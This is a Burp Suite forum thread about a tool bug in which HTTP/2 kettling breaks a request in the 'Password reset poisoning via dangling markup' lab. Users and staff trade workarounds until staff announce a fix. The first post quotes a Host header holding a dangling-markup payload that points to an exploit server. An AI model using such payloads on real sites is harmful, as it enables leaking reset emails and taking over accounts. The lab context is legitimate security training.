Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Adding Space in Header Kettles Request

Lewis | Last updated: May 26, 2023 12:03PM UTC

Hey, I'm going through the following lab: Password reset poisoning via dangling markup Whenever I add a space to my Host header, Burp Suite kettles my request which causes the CSRF token to not be sent along correctly giving me an HTTP 400 response "Missing parameter 'csrf'" According to the explanation of kettling at https://portswigger.net/burp/documentation/desktop/http2 this header value should not cause the request to be kettled: Host: 0ac50042037df6f081b8393b00dd00b6.web-security-academy.net:'<img src="exploit-0a4c00b30384f625812c38d8017e00fa.exploit-server.net/?src= Am I misunderstanding something here?

Michelle, PortSwigger Agent | Last updated: May 30, 2023 12:17PM UTC

Thanks for getting in touch. We'll take a look through the lab and be in touch soon.

Michelle, PortSwigger Agent | Last updated: May 31, 2023 02:33PM UTC

Hi In step 7, changing the host header using the Inspector panel rather than directly in the Message Editor should allow the request to be sent successfully. Please let me know if this helps.

Janis | Last updated: Jun 17, 2023 06:12PM UTC

Same problem here. Solution provided by Michelle didn't help either, response is still "Missing parameter csrf" or empty at all. I'm on Version 2023.6.1 (2023.6.1).

Ben, PortSwigger Agent | Last updated: Jun 20, 2023 08:34AM UTC

Hi, Are you able to provide some specific details (some screenshots might help) of what you are doing when you experience this issue so that we can see exactly the circumstances involved?

Humble255 | Last updated: Jun 30, 2023 04:53AM UTC

Hi there, have same issue in lab lab-host-header-basic-password-reset-poisoning Even when I changed it with the inspector BE rejected request as an invalid host, and Burp sho popup that request is kettled. However, I was able to workaround. I did not replace full host, but copied custom host in the middle of original one. Then I was removing letter by letter before and after my custom host. Then it worked.

Liam | Last updated: Jul 26, 2023 10:30AM UTC

Same problem for me. Tried all above recommended solutions without success.

Ben, PortSwigger Agent | Last updated: Jul 26, 2023 05:06PM UTC

Hi Liam, Just to clarify - are you having issues with the 'Password reset poisoning via dangling markup' lab that other users in this thread have mentioned or the 'Basic password reset poisoning' lab that the previous poster mentioned?

Dominyque, PortSwigger Agent | Last updated: Aug 30, 2023 12:23PM UTC

Hi All We wanted to update the thread with the news that the issue of adding dangling markup to a request in Message Editor causes a request to be kettled, has been fixed in v2023.10 (https://portswigger.net/burp/releases/professional-community-2023-10)

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.